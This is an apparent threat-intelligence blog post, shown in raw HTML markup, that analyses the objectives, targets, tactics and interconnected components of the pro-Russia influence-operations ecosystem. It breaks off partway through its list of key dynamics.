&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Four years into Russia’s full-scale invasion of Ukraine, the pro-Russia influence ecosystem has evolved from a tool of war back into a global strategic asset. Since the mobilization of this ecosystem to support frontline objectives, we have witnessed the expedited development of new influence assets linked to multiple, expansive, covert information operations (IO) campaigns and a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/global-revival-of-hacktivism"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;revitalization&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; of pro-Russia hacktivism at an unprecedented scale. While this threat activity initially adapted to encompass Ukraine-related priorities, it is gradually pivoting back to established Russian influence objectives for which the ecosystem was originally honed. This shift is significant because it likely signals increased focus outside of Ukraine, warning that pro-Russia influence activity targeting the European Union (EU), North Atlantic Treaty Organization (NATO), and other top targeting priorities may intensify. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ultimately, the war in Ukraine has provided a critical feedback loop for Russia to refine its influence activity, lessons that we anticipate will be applied as the ecosystem continues to reorient toward global strategic objectives while maintaining focus on Ukraine. Further, recent pro-Russia IO indicates the continued expansion of already diverse tactics, and the increasing use of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;generative AI tooling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for planning, research, and content creation marks a forward trend in pro-Russia IO. Meanwhile, new and different actors have adopted IO tactics to meet an increasingly diverse set of challenges, signaling growing Russian reliance on influence tactics. Together, these trends likely demonstrate the Kremlin's perception of these tactics as cost effective and successful. The interconnected nature of the ecosystem's disparate components makes it resilient to limited scope disruptions, which defenders must consider to effectively mitigate pro-Russia influence threats. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Ecosystem at a Glance: Objectives, Targeting, and Tactics&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Russia's modern approach to information operations is built on the conceptual foundation of Soviet-era "&lt;/span&gt;&lt;a href="https://www.marshallcenter.org/en/publications/security-insights/active-measures-russias-covert-geopolitical-operations-0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;active measures&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;" adapted for the digital age. Alongside disruptive cyberattacks dating back to the early 2000s, the Kremlin has increasingly harnessed internet-based platforms for espionage and information operations. Russia's approach has evolved from rudimentary, singular operations into a complex, self-sustaining environment intentionally curated by the Russian Government that blends overt, covert, and independent elements to advance Kremlin interests both at home and abroad.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Core Influence Objectives &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG’s observations suggest the primary strategic motivations driving the pro-Russia influence ecosystem fall into five categories, each aiming to achieve military and/or political objectives through psychological manipulation of the target audience (Figure 1). Collectively, these objectives informally depict a global influence strategy: through the furthest reach of its influence, the Kremlin seeks to diminish Western primacy and advance Russia's global position; within its surrounding region, it strives to retain and return Moscow's dominance; and at home, it works to ensure the stability of the political regime.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Core objectives of the pro-Russia influence ecosystem" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Core objectives of the pro-Russia influence ecosystem&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Targeting&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pro-Russia influence operations are pivoting from the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/information-operations-surrounding-ukraine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;near singular focus on Ukraine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that dominated the ecosystem since 2022. We expect influence operations advancing Russia's war-specific interests to continue. However, as Russia seeks to reemerge from international isolation, we have increasingly observed a concurrent focus on pre-war pro-Russia influence objectives. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The current and historical targeting scope of each ecosystem component exposes both the Kremlin's global ambitions and the realistic limitations of its power projection. State-owned media organizations produce content intended to serve populations across six continents, but in recent years, sanctions and other factors have limited its production and distribution. Meanwhile, covert operations have appeared more limited in scope, primarily targeting the West and countries surrounding Russia, with intermittent operations targeting the Middle East and Africa, indicating that finite resources necessarily limit these operations (Figure 2).&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Top Regional Targets&lt;/span&gt;&lt;/h5&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The United States and Europe:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Kremlin has long viewed the West as a top adversary of Russia. Accordingly, the US and Europe are top targets of covert pro-Russia information operations, especially aimed at undermining political stability within these countries and the unity between them. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;NATO and the EU embody the collective "West" and are Russia's perceived top adversaries&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, second only to the US independently.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Russia's "Near Abroad":&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Since the dissolution of the Soviet Union, Moscow has asserted that the countries that formerly comprised part of the USSR now reside in Russia's so-called "sphere of influence." Covert influence targeting this region directly reflects Moscow's assertion that Russia is a world power entitled to special privileges within its neighborhood. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Middle East and Africa:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Over the past decade, Russian efforts to reassert itself as a global power have included high-profile investments in cultivating Russia's standing in the Middle East and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/io-campaigns-russian-prigozhin-persist"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Africa&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Covert pro-Russia influence activity is likely deployed in tandem as intended support for other Russian initiatives in these regions.  &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Russia Domestic:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Internally targeted covert IO is a well-established component of pro-Russia influence activity, deployed by regime-aligned actors to promote Kremlin policies and repress opposition voices. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Targeted Entities and Global Events&lt;/span&gt;&lt;/h5&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Olympics:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Russia has long viewed Olympic participation as a point of national prestige, and GTIG has observed notable Russian influence activity targeting the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-2024-paris-olympics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Olympics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the face of Russian participation bans. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;War in Ukraine:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/information-operations-surrounding-ukraine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;war in Ukraine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has been a key driver of Russia's influence activity, including attempts to influence events on the ground as well as influence activity intended to advance Moscow's interests elsewhere vis-a-vis the war. GTIG expects that Ukraine will remain a priority in Russia's targeting calculus during the post-conflict phase following any future peace agreements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Elections:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Election targeting aligns with multiple Russian influence objectives, including attempting to undermine confidence in democratic institutions as well as internally weakening perceived Western adversaries. These operations regularly target elections in countries that are already prioritized by ongoing pro-Russia influence activity. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ad Hoc Geopolitical Flashpoints and Global Events:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Russian influence actors have a history of pivoting activity to engage with emerging geopolitical developments and events, such as the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/limited-shifts-cyber-threat-landscape-driven-covid-19?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;COVID-19 &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;pandemic or the&lt;/span&gt;&lt;a href="https://apnews.com/article/iran-war-images-misinformation-russia-israel-9e495017dc5c4bf24a0b6152863dbfb1" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; 2026 Middle East &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;conflict. This flexible target selection often overlaps or is aligned with other Russian priorities, making previously observed Russian influence activity helpful in anticipating which events may be appropriated.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Priority targets of the ecosystem" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig2.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: Priority targets of the ecosystem&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Tactics&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Converging geopolitical and technological developments make the evolution of pro-Russia influence tactics a particularly important space to monitor right now. The pro-Russia influence ecosystem expanded to support the war effort, bringing change across the spectrum of activity and providing operators the opportunity to hone their tactics, techniques, and procedures (TTPs) in the rapid feedback loop of war. Meanwhile, the emergence and increased democratization of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;generative AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; tooling has brought both promised and already realized opportunities to support all phases of the IO lifecycle. The following are a sample of key tactics that illustrate how pro-Russia actors currently blend well-tested methods with new technological developments to reach audiences through diverse means:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Generative AI: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;has observed&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; pro-Russia influence actors increasingly leverage AI tooling to support different stages of their operations, including support for planning and general research as well as content creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Threat Intelligence Group (GTIG) is closely tracking the transition from nascent AI-enabled operations to the maturing, industrial-scale application of generative models within adversarial workflows across threats ranging from espionage and crime to IO. Please see our latest &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI threat tracker&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for more information on how this threat is developing based on our insights, and what Google is doing to protect our customers. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Narrative Resonance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Hijacking existing ideological and emotional fissures within a society provides pro-Russia influence actors tailored narratives to target audiences and potentially increases potential engagement and impact. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cyber-Enabled IO:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Influence campaigns frequently coincide with destructive cyberattacks, such as the deployment of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/gru-disruptive-playbook?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;wiper malware&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; alongside website defacements containing false surrender messages, or the historic use of "hack and leak" campaigns in which exfiltrated data, sometimes manipulated, is then publicized through an actor-controlled false persona. In some instances, Russian actors may even leverage direct cyber espionage targeting as a way to achieve psychological effects, intending to influence victims' behavior through intimidation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Media Mimicry:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Pro-Russia actors have attempted to mimic legitimate media at scale and through a variety of means, including via the wholesale appropriation of legitimate media brands or developing inauthentic media brands that generally masquerade as independent news sources. These tactics are intended to add a veneer of legitimacy to the promoted narratives. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Direct Dissemination: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Pro-Russia influence actors have used closed communication channels, such as emails, SMS text messages, and messenger apps, to disseminate various types of pro-Russia narratives as an adjunct to or outside typical social media-focused operations. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Core Ecosystem Components &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The current pro-Russia influence ecosystem operates across a spectrum from official government communications to deniable covert actions conducted by intelligence services and "patriotic" proxies. GTIG identified six core components that represent key activity types (Figure 3). While many elements are state-directed or state-affiliated, the ecosystem is also a cultivated, self-sustaining system: various actors, often without explicit direction, amplify Kremlin-friendly narratives and pursue actions that advance Russia's strategic interests. This fluidity provides resilience and complicates attribution, mirroring the longstanding Kremlin strategy to co-opt non-state actors, including criminal networks for &lt;/span&gt;&lt;a href="https://www.rusi.org/explore-our-research/publications/commentary/operation-destabilise-russia-organised-crime-and-illicit-finance" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;finance&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;a href="https://www.bbc.com/news/articles/cz91dk0l50no" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;illicit logistics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, to achieve state objectives without direct attribution. Although each of the core ecosystem components serves as a unique lever the Russian Government can employ to achieve desired objectives, they are regularly used together. For instance, while the entire pro-Russia hacktivist landscape is not state-sponsored, the Russian intelligence services have used both genuine and fabricated hacktivist personas to launder stolen data as part of blended cyber espionage and IO hybrid operations.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Core components of the pro-Russia influence ecosystem" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig3.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: Core components of the pro-Russia influence ecosystem&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;An Interconnected Ecosystem Enhances Influence Utility&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4 illustrates the complex, interconnected nature of the pro-Russia influence ecosystem by mapping relationships between a selection of key actors and organizations across five of the core components. The ecosystem functions as a cohesive unit, not only through shared objectives, but also through direct cross-component interactions. The Russian Government functions as the sixth core ecosystem component, setting the policy and talking points that inform the ecosystem’s promoted narratives and sponsoring overt and covert assets throughout the other five components diagrammed in Figure 4. Through these levers, the Kremlin fosters the cross-component links that underpin the ecosystem, enhancing its overall utility as a versatile tool of state influence.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Subset of actors that illustrate how different components of the ecosystem interact with each other" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 4: Subset of actors that illustrate how different components of the ecosystem interact with each other&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;10 Key Dynamics for Understanding the Pro-Russia Influence Ecosystem&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The scope and diversity of activity in the pro-Russia influence ecosystem challenges defenders tasked with enumerating, tracking, and countering its threats. GTIG has distilled 10 key ecosystem dynamics based on our current understanding of its components and how they each enable covert influence activity. These dynamics frame critical aspects of how activity manifests within the ecosystem, providing a high-level guide to understand and track these threats.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Large-scale IO campaigns are an integral element of the pro-Russia influence ecosystem. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Major pro-Russia IO campaigns have been an enduring feature of the pro-Russia ecosystem, with new campaigns emerging as previous ones fall into inactivity. Maintaining extensive IO campaigns and their associated established influence infrastructure enables proactive &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy0628" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;messaging&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on strategic issues and underpins a capability that can be rapidly adapted for emerging domestic and global priorities.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Long-established IO campaigns, like Secondary Infektion, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/information-operations-surrounding-ukraine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pivoted to meet&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; new strategic needs as Russia’s 2022 invasion of Ukraine began. New IO campaigns, such as “Operation Overload,” subsequently emerged to support the war effort; while Secondary Infektion has become dormant, these “successor” campaigns have since been leveraged to advance other global Russian influence objectives beyond the war itself. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pro-Russia actors often prioritize persistence &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;and the range of tactics they leverage reflects this. In the face of public exposure and disruption, pro-Russia actors and their infrastructure have often remained persistent, sometimes making tactical adjustments to mitigate the effects of detection and disruption and other times continuing operations unabated. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These persistence tactics include the Doppelganger campaign and overt &lt;/span&gt;&lt;a href="https://www.bloomberg.com/news/articles/2023-11-23/ukraine-war-how-kremlin-propaganda-websites-dodge-disinformation-sanctions#xj4y7vzkg" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Russian media&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;’s respective cycling of domain infrastructure and/or use of mirror domains to overcome exposure, platform bans and sanctions. Influence operators also frequently continue using compromised assets, sometimes mocking their exposure, as seen with the legacy US-targeted NAEBC campaign and the APT44-affiliated hacktivist persona XakNet Team.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="NAEBC-linked persona account" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 5: NAEBC-linked persona account mocking public exposure of influence assets (left), and GRU-sponsored XakNet Team persona mocking then-Mandiant (now part of Google Threat Intelligence Group) attribution of the group’s activities to the GRU (right)&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pro-Russia and Russian cyber espionage groups leverage IO tactics to support their operations and weaponize stolen data and/or illicit access&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. While less frequent, this &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;hybrid activity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a critical dynamic within the pro-Russia influence ecosystem. GTIG has previously observed operations used to shape narratives around &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/gru-disruptive-playbook"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cyberattacks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and influence events on the ground and to conduct foreign political interference, including the repeated targeting of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;foreign elections&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, reported in Spring 2024. We have attributed some observed instances of this to Russian government-sponsored threat actors.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Russian state sponsored or pro-Russia hacktivist groups have long relied on public advertisement of real or claimed data exfiltration to highlight their operations, intimidate targets, or sway public opinion. In 2022, UNC4057 (COLDRIVER) used data stolen from espionage targets in a high profile hack-and-leak operation seeking to exacerbate divisions in UK politics. More recently, the self-proclaimed hacktivist group &lt;/span&gt;&lt;a href="https://cert.gov.ua/article/6287707" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;PalachPro&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; claimed in February 2026 to have gained unauthorized access to a Ukrainian government online portal and publicly posted &lt;/span&gt;&lt;a href="https://caspianpost.com/regions/russian-hackers-target-ukraine-s-starlink-authorisation-service" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;screenshots&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; of the claimed compromise. The Ukrainian government has previously noted that the portal does not store the type of data the threat actor claimed to compromise, suggesting the public posting was likely intended as influence activity, attempting to create the illusion of a more serious threat.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="UNC4057 leak website attempting to inflame public debate" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig6.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 6: UNC4057 leak website attempting to inflame public debate&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pro-Russia hacktivists serve a direct influence function. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Modern pro-Russia hacktivism has evolved into an important component of the influence &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/global-revival-of-hacktivism"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ecosystem&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that blends &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/apt44-unearthing-sandworm"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;state-backed actors&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; leveraging &lt;/span&gt;&lt;a href="https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;hacktivist tactics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with an evolving cohort of likely third-party hacktivist actors that support Russia's geopolitical interests. Pro-Russia hacktivist groups gain domestic and foreign attention for strategic messaging via their &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/killnet-new-capabilities-older-tactics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;claimed threat activity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, amplify narratives directly seeded in overt ecosystem segments, and at times also support traditional IO activity or create a means of plausible deniability for state-sponsored espionage actors. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
